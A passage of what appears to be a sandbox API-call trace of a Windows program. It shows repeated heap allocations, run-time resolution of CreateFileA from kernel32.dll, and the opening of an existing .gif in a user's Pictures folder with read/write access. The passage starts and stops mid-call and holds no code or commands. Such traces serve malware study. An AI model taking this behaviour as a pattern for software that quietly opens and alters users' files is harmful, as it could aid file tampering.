Flags=0x0, Size=0x20) returned 0x7b14e0 [0039.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0039.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0039.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0039.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0039.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0039.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0039.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0039.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0039.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0039.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0039.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0039.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0039.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0039.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0039.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0039.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0039.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0039.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0039.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0039.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0039.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0039.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0039.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0039.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0039.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0039.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0039.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0039.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0039.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0039.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0039.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0039.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0039.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0039.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0039.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0039.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0039.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0039.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0039.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0039.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0039.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0039.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0039.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0039.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0039.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0039.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0039.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0039.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0039.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0039.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0039.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0039.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0039.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0039.990] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0039.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0039.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0039.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88ccb8 [0039.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88ccb8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0039.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0039.990] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0039.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0039.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0039.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0039.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0039.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0039.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0039.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0039.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ccb8 [0039.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88ccb8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0039.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0039.991] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0039.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0039.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0039.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0039.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0039.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0039.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0039.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0039.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0039.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0039.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0039.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0039.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xab2010 [0039.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif", cchWideChar=105, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 105 [0039.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x69) returned 0x7db378 [0039.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif", cchWideChar=105, lpMultiByteStr=0x7db378, cbMultiByte=105, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif", lpUsedDefaultChar=0x0) returned 105 [0039.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0039.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0039.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0039.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0039.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0039.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0039.992] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\a-rptl9rgzl\\eqssafks-mgdt6pjw\\uruf9ajfh14ze.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0039.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0039.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0039.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0039.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0039.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0039.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0039.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0039.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0039.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0039.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0039.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0039.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0039.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0039.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0039.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=105, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0039.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd2) returned 0x7c5448 [0039.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=105, lpWideCharStr=0x7c5448, cchWideChar=105 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif") returned 105 [0039.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0039.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xe0) returned 0xab0028 [0039.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0039.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0039.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0039.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0039.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0039.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0039.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0039.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0039.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0039.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0039.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0039.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0039.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0039.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0039.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0039.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0039.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0039.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0039.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0039.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0039.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0039.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0039.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0039.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0039.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0039.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0039.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0039.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0039.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0039.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0039.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0039.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0039.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0039.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0039.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0039.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0039.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0039.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0039.995] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0039.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0039.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0039.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0039.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0039.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0039.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0039.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0039.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0039.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0039.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0039.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0039.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0039.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0039.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0039.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0039.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0039.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0039.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0039.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0039.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0039.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0039.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0039.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0039.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0039.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0039.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0039.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0039.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0039.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0039.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0039.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0039.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0039.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0039.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0039.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0039.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0039.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0039.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0039.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0039.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0039.996] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0039.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0039.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0039.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0039.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0039.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0039.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0039.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0039.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0039.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0039.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0039.996] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 